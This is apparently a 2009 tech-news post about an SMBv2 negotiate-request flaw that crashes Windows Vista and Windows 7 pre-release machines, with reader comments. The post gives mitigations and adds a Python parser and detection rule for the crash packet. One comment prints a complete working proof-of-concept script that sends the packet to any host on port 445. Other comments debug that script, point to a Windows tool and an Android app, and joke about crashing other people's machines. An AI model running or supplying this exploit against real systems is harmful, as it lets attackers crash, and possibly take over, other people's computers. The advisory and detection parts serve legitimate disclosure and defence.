Windows 7 and Vista crash via SMB exploit


[Laurent Gaffié] has discovered an exploit that affects Windows Vista, Windows 7, and possibly Windows Server 2008 (unconfirmed). The attack goes through the NEGOTIATE PROTOCOL REQUEST, the first SMB message a client sends, so it happens before any authentication takes place. The vulnerability is present only on Windows versions that include Server Message Block 2.0 and have the protocol enabled. A successful attack requires no local access or credentials, just a TCP connection to port 445, and results in a Blue Screen of Death.

[Laurent] has a proof of concept available with his writeup in the form of a Python script (please, white hat use only). There is no patch for this vulnerability yet, but disabling SMB, or blocking TCP port 445 (and 139) at the firewall, will protect your system until one is available.

Update: According to the Microsoft advisory this vulnerability could lead to remote code execution, not just a crash, making it a bit worse than we thought. On the bright side, they state that the final (RTM) version of Windows 7 is not open to this attack, only Windows Vista and Windows Server 2008.
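
To make the packet concrete, here is an added example (not Laurent's PoC and not code from this post) in Python 3 that parses a NetBIOS-framed SMBv1 NEGOTIATE PROTOCOL REQUEST, pulls out the Process ID High field and the list of offered dialects, and flags the shape of the crash packet posted later in this comment thread: a non-zero PID High in a request that also offers the "SMB 2.002" dialect. The packet bytes are the PoC's; the detection rule ("a legitimate client sends PID High = 0 here") and the function names are my assumptions. The builder only produces bytes and nothing here touches the network.

```python
import struct

# SMBv1 header constants (MS-CIFS). POC_PACKET is the proof-of-concept request
# posted by Tiao in the comment thread, copied verbatim so the parser and the
# builder can both be checked against it.
SMB1_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72
POC_DIALECTS = ["PC NETWORK PROGRAM 1.0", "LANMAN1.0", "Windows for Workgroups 3.1a",
                "LM1.2X002", "LANMAN2.1", "NT LM 0.12", "SMB 2.002"]
POC_PACKET = (
    b"\x00\x00\x00\x90"
    b"\xff\x53\x4d\x42"
    b"\x72\x00\x00\x00"
    b"\x00\x18\x53\xc8"
    b"\x00\x26"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
    b"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
    b"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
    b"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
    b"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
    b"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
    b"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
    b"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
    b"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
    b"\x30\x30\x32\x00"
)


def build_negotiate(pid_high, dialects, flags=0x18, flags2=0xC853,
                    tid=0xFFFF, pid_low=0xFEFF):
    """Frame an SMBv1 NEGOTIATE PROTOCOL REQUEST inside a NetBIOS session message.

    The defaults reproduce the header values the PoC uses; only pid_high and the
    dialect list vary. A well-behaved client passes pid_high=0."""
    header = SMB1_MAGIC + struct.pack(
        "<BIBHH8sHHHHH",                      # command, status, flags, flags2, pid_high,
        SMB_COM_NEGOTIATE, 0, flags, flags2, pid_high,
        b"\x00" * 8, 0, tid, pid_low, 0, 0)   # signature, reserved, tid, pid_low, uid, mid
    data = b"".join(b"\x02" + d.encode("ascii") + b"\x00" for d in dialects)
    smb = header + struct.pack("<BH", 0, len(data)) + data   # WordCount=0, ByteCount
    return struct.pack(">I", len(smb)) + smb                  # NetBIOS: type 0x00 + 3-byte length


def parse_negotiate(packet):
    """Parse a NetBIOS-framed SMBv1 negotiate. Raises ValueError on malformed framing;
    the PID High value itself is returned untouched so the caller can judge it."""
    if len(packet) < 4 + 35:
        raise ValueError("too short for NetBIOS + SMB header")
    nb_type = packet[0]
    nb_len = struct.unpack(">I", b"\x00" + packet[1:4])[0]
    smb = packet[4:]
    if nb_type != 0 or len(smb) != nb_len:
        raise ValueError("bad NetBIOS session framing")
    if smb[:4] != SMB1_MAGIC:
        raise ValueError("not an SMBv1 header")
    (command, _status, _flags, flags2, pid_high, _sig, _res,
     _tid, pid_low, _uid, _mid) = struct.unpack("<BIBHH8sHHHHH", smb[4:32])
    word_count, byte_count = struct.unpack("<BH", smb[32:35])
    if command != SMB_COM_NEGOTIATE or word_count != 0:
        raise ValueError("not a NEGOTIATE PROTOCOL REQUEST")
    data = smb[35:35 + byte_count]
    if len(data) != byte_count:
        raise ValueError("ByteCount runs past the end of the packet")
    dialects, pos = [], 0
    while pos < len(data):
        if data[pos] != 0x02:                 # each dialect is 0x02 + ASCIIZ name
            raise ValueError("dialect entry missing 0x02 buffer-format byte")
        end = data.index(b"\x00", pos + 1)
        dialects.append(data[pos + 1:end].decode("ascii"))
        pos = end + 1
    return {"flags2": flags2, "pid_high": pid_high, "pid_low": pid_low,
            "dialects": dialects}


def matches_poc_trigger(packet):
    """Detection rule for the request shape in the PoC: a negotiate offering the
    SMB 2.002 dialect while carrying a non-zero PID High. Assumption (mine, matching
    the PoC's own comment): a legitimate client sends PID High = 0 in this message."""
    try:
        req = parse_negotiate(packet)
    except ValueError:
        return False
    return req["pid_high"] != 0 and "SMB 2.002" in req["dialects"]


if __name__ == "__main__":
    req = parse_negotiate(POC_PACKET)
    print("PID High = 0x%04x, dialects = %s" % (req["pid_high"], req["dialects"]))
    print("PoC trigger:", matches_poc_trigger(POC_PACKET))
    print("Builder reproduces PoC byte for byte:",
          build_negotiate(0x2600, POC_DIALECTS) == POC_PACKET)
```

The PoC's `\x00\x26` is a little-endian PID High of 0x2600, i.e. the "&" byte sits in the high-order byte; the bytes before it (command 0x72, Flags 0x18, Flags2 0xc853) are exactly what an ordinary negotiate carries, which is why a filter on the PID High field, not on the dialect list alone, is what distinguishes this request from normal traffic.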

[via Full Disclosure]

[picture: Inquirer]

Comments

  1. The_Evil_Machinist says:

    99 bugs in the os that I use
    99 bugs in the os
    Patch one bug
    Install the new bug fix,
    101 bugs left in the system that I use!

  2. MrX says:

    This one is pretty ugly. I wouldn’t like having my computer get an intentional BSOD in a library, on a university network or at a LAN party.

    I use another OS, so no problem, but if I had Windows I would block port 443. This will stop your Windows from file sharing, but it is still better than letting others blue-screen it.

  3. m0zzie says:

    Yup, saw this today. There’s a Windows command-line PoC available too. Tested and confirmed earlier.

    The win command line tool is at http://www.dereenigne.com

  4. proofreading nazi says:

    It “effects” Windows? Well…that word does fit there grammatically, but you probably meant “affects”.

  5. Addictronics says:

    I remember when I used to come here for NEW tech news/hacks (really hacks) but now even reddit is ahead…. /rant

    cool..

  6. rsvpepper says:

    That is why I use Ubuntu! Forget Windows go Linux!

  7. Mio says:

    The RTM version of 7 is not affected. Only prerelease versions are vulnerable to this.

  8. jbot says:

    rsvpepper, I too am a full-time Linux user, but I need to say, don’t become smug about it. Ubuntu still breaks terribly on too much hardware to be a full-time solution for everyone. It is not THE ANSWER. I mean, my wireless is unstable, my sound is sort of broken, my touchpad’s driver doesn’t allow me to turn off tap-to-click, and connecting to FTP via the option in Nautilus stalled and left a file copy open indefinitely. I am on an Eee that is a couple years old, running 9.04. It is stable enough for what I do with it (take notes) but it isn’t great. It works beautifully on my older Dell Latitude though.

    It is ready for a lot of people on the desktop, but you need to do your research before posing it as the answer to life, the universe, and everything. It will get there, but it is going to take some time.
    [/offtopic]

    I agree with full disclosure. I honestly don’t see how anyone can sympathize with such an excruciatingly slow-to-react company.

  9. speps says:

    “with her writeup”

    BTW, Laurent is a male name.

  10. RizzyRong says:

    Oh what a scary day,…….

    Everyone love them some Windows Domains right about now.

    How many admins admittedly have a little bit of sweat running down their brow??

  11. Mike Szczys says:

    @speps: thanks, updated.

  12. Catur says:

    Wow, thanks for the information. I should tell all the Windows 7 & Vista users in my school. I don’t want them keeping me busy all day because some script kiddie ran this vulnerability script.

    “To all Win 7 & Vista users: please stop your file sharing and put up a firewall.”

  13. Austin says:

    This does not affect Windows 7 RTM, only the RC and beta

  14. MrX says:

    @Mio
    @Austin
    Yeah, it doesn’t, I just experienced that when trying to bring a friend’s computer offline :)

    @Addictronics
    Just because you don’t like the post doesn’t mean others don’t like it either. Instead of getting furious, you should be happy that Hackaday is publishing public security disclosures.
    Maybe you would rather find out about this vulnerability “the hard way” (i.e. getting a BSOD) instead? Because I don’t think so.

    @rsvpepper
    I also use GNU/Linux but I don’t think this is the correct way of calling people either.

    @jbot
    IMHO, OS wizardry and automation are more prone to bugs and breakage (assuming people know what they are doing with manual configuration).
    So have you tried another GNU/Linux with a different tradeoff between automation and bugginess? Maybe you’d like it.

    @Me
    STFU already and stop procrastinating work.

  15. SexieWASD says:

    1 bug in the os that I use
    1 bug in the os
    Patch one bug
    Install the new bug fix,
    Break xorg.conf…

    crap.

  16. Malef says:

    Just another cool way to reboot your desktop…..or someone else’s.

  17. sly says:

    @SexieWASD
    runlevel 3 is your friend… *evil mad scientist grin*
    http://www.ubergeek.tv/article.php?pid=54

  18. monkeyslayer56 says:

    whahahahahahaha *evil grin* hmmmm, sounds like fun, especially since I’m a full-time Linux user lol

  19. NoiseFilter says:

    @SexieWASD

    Nobody tunes Xorg.conf anymore.
    * Screen resolution is auto-detected by XrandR, or proprietary drivers, the same for multi-screen setups.
    * Most distros use the XInput/hal for auto-detecting and configuring input devices.

    You can even delete Xorg.conf, your screen will be set up correctly and the keyboard/mouse recognized.

    Golden rule of ignorance:
    The less you know about it, the funnier the joke will be.

  20. OrderZero says:

    Actually, for my computer I have to tune xorg.conf every time I reformat because it detects my video card settings completely wrong. I mean, it’s no big deal for me, but for a lot of people who don’t know, it’d be a real turnoff.

    Posting from my debian machine ssh tunneled through a freebsd machine <3

  21. Dave says:

    You know what? I think I might just abandon M$ forever… Those evil M$ bastards are just after my money. They have it so much better over at the app store. Knowledge and innovation, after all, were meant to be controlled by corporations. Don’t you know that the blue screen of death and the frowning Mac icon are mere fantasy? Yes, pound your machine for your own misunderstanding of how it actually works. You MUST understand that corporations need to control your machine for you. You and I are far too unintelligent to understand what our machine is doing for us.

  22. Agent420 says:

    @ Dave

    [img]http://img353.imageshack.us/img353/9117/daveyv6.jpg[/img]

  23. Dave says:

    Dude,

    I just shouted on Hack a Day! Feels great!

  24. Tiao says:

    With arguments:

    ———–

    #!/usr/bin/python
    # When SMB 2.0 receives a "&" (0x26) byte in the "Process ID High" SMB header field
    # it dies with a PAGE_FAULT_IN_NONPAGED_AREA error.
    # Bytes literals and print() keep this running under Python 2.6+ as well as Python 3.

    from socket import socket
    import sys

    print("\n~> SMBv2.0 Negotiate Overflow")

    if len(sys.argv) != 2:
        print("~> Error - Usage: %s <host>" % sys.argv[0])
        sys.exit(0)

    host = (sys.argv[1], 445)   # SMB over TCP
    buff = (
        b"\x00\x00\x00\x90"  # NetBIOS session message, length 0x90 = 144 bytes
        b"\xff\x53\x4d\x42"  # Server Component: SMB
        b"\x72\x00\x00\x00"  # Command: Negotiate Protocol (0x72), NT Status (first 3 bytes)
        b"\x00\x18\x53\xc8"  # NT Status (last byte), Flags 0x18, Flags2 0xc853
        b"\x00\x26"          # Process ID High: "&" --> :) normal value should be b"\x00\x00"
        b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"  # Signature, Reserved, TID, PID
        b"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"  # UID, MID, WordCount 0, ByteCount 0x6d, dialects follow
        b"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"  # "PC NETWORK PROGRAM 1.0"
        b"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"  # "LANMAN1.0"
        b"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"  # "Windows for Workgroups 3.1a"
        b"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
        b"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"  # "LM1.2X002"
        b"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"  # "LANMAN2.1", "NT LM 0.12"
        b"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
        b"\x30\x30\x32\x00"                                          # "SMB 2.002"
    )
    s = socket()
    s.connect(host)
    s.send(buff)
    s.close()

  25. whitewiz says:

    All setup to test Windows Server 2008 R2 when i run the python script i get the following error:

    C:\temp>Smb-Bsod.py 192.168.1.11
    Traceback (most recent call last):
    File “C:\temp\Smb-Bsod.py”, line 25, in
    s = socket()
    NameError: name ‘socket’ is not defined

    C:\temp>

    does it require 2 arguments?

  26. whitewiz says:

    C:\temp>Smb-Bsod2.py 192.168.1.11
    Traceback (most recent call last):
    File “C:\temp\Smb-Bsod2.py”, line 36, in
    s.send(buff)
    TypeError: must be bytes or buffer, not str

    C:\temp>

    grr, what a formatting nightmare

  27. m0zzie says:

    whitewiz, initialise the buffer with create_string_buffer()

    alternatively, just use the win32 example at http://www.dereenigne.com

  28. I don’t get it. I used the Python program (which someone also posted above), and after fixing a couple of errors (add “import socket” and change “socket()” to “socket.socket()“), it didn’t work. Wireshark confirmed that the machine was getting the packet of death (and was even attempting to respond to it), but no bluescreen occurred.

    No updates installed; no firewall. I suspect the exploit program has been intentionally crippled so script kiddies like me can’t willy-nilly crash machines. :)

  29. m0zzie says:

    Have just finished my Android implementation of this PoC.

    Available in the Android market by searching for BSODroid, or you can grab it from http://www.dereenigne.com/

    Fun little tool to have on your mobile phone! :)

  30. cyberpunk64bit says:

    99 fixes for windows to patch down, 99 fixes to patch, you take one down, patch it around, 100 fixes to patch down. 100 fixes to patch down, 100 fixes to patch, you take one down, patch it around, 101 fixes to patch down.. :D

  31. Jackson says:

    http://www.dereenigne.com/ for me only pops up a command prompt that quickly closes.

  32. CB says:

    I just ran this against Windows 7… Microsoft lied about it not being affected.

  33. CB says:
  34. CB says:
  35. leeroy says:

    The error “TypeError: must be bytes or buffer, not str” appears if you have Python 3.x installed.
    Just uninstall Python 3.x and install Python 2.6.x

  36. Bowser says:

    THOSE PESKY PLUMBERS AGAIN

  37. hackthisway says:

    @Mrx not 443, it is 445

  38. rajiv shah says:

    It was a really awesome trick, but if you want some more, check the link given below….

    http://minefreestuff.blogspot.com/2009/12/raise-your-windows-vista-rating-tweak.html

  39. Windows Vista is good, but it can hog your CPU and memory.
